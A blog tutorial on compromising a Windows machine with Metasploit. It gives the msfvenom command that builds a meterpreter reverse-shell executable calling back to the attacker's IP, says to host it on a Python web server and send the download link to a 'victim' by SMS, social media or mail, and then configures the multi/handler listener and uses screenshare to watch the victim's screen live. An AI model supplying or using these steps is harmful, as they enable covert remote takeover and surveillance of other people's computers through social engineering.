Hacking in to Windows using Metasploit

Estimated read time 4 min read

Metasploit: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, The Metasploit framework is a very powerful tool which can be used by cyber criminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers. Because it’s an open-source framework, it can be easily customized and used with most operating systems

What we can do with Metasploit

With Metasploit, the pen testing team can use ready-made or custom code and introduce it into a network to probe for weak spots. As another flavor of threat hunting, once flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Portions of this tool reside within the Metasploit framework, which is built into the Kali Linux OS.

Metasploit is a powerful tool used by network security professionals to do penetration tests, by system administrators to test patch installations, by product vendors to implement regression testing, and by security engineers across industries. The purpose of Metasploit is to help users identify where they are most likely to face attacks by hackers and proactively mend those weaknesses before exploitation by hackers.

Let`s Start Hacking in to Windows

Metasploit: can allow you to generate a custom payload to the victim machine, now I`m going to generate a payload to attack a windows machine using Metasploit.

Just start your kali Linux and upon up terminal, then I type the following command

msfvenom –p /windows/x64/meterpreter/reverse_tcp lhost 10.0.2.15 lport 9999 –f exe > /home/Abubakar/Desktop/payload3.exe.

Description of the Command

-p means payload

Then /windows/x64/meterpreter/reverse_tcp means the payload is windows 64bit and reverse tcp

LHOST my IP address

LPORT the port number I’m going to use

-f file type exe windows executable

And I redirect it to my desktop.

The payload3.exe is the name of my payload you can name it with anything you want like your name e.t.c The /home/Abubakar/Desktop/ this is the directory to keep the payload in your computer.this can work on even 64bit of windows(victim OS). 

To know you IP Address open new terminal and type ifconfig

The numbers after inet is your IP

 

Now you can send your payload via SMS, social Media, mail e.t.c but know we are going to provide a link to the victim using the Kali Linux Python Server. to start the server type. python3 -m http-server 8080

know our server has been started

Just send you victim link like this http://10.0.2.15/Desktop/python3.exe

the 10.0.2.15 is my ip address in your case put yours and / the directory + the file name.

When the victim click on the link it would automatically download the file, to his system.

Know lets move to the next step

In kali lick on application icon navigate to Exploitation Tools And click Metasploit framework

When it start run the following commands

use mult/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.2.15 . in this case your IP after lhsot
set lport 9999. make sure you use the same port as above
run

Know it would wait for the victim to download the file if the victim click the link.. then Boom!!.

Know we are In meterpreter session which means we are In!.

You can now do whatever You want with the victim pc you can type help or options to view different command options. Now I execute a command to share the victim screen as shown below   just type this

screenshare

A link would be provided as you can see, copy it and paste in your browser.

Those are the two machines the victim and the attacker is watching the victim`s machine live.

The Victim vs The Hacker

That`s it!. I Hope you enjoyed it, for any question feel free to ask in the comment section below. Thanks!.

Abubakar Abdurrahman https://sadeeqtech.com.ng

Young IT Expert CEO Sadeeq Technologies and a former student of Informatics Academy. Now a Web/App Developer by Profession, Penetration Tester by Passion and Linux Administrator by Interest.

You May Also Like

More From Author

1 Comment

Add yours

+ Leave a Comment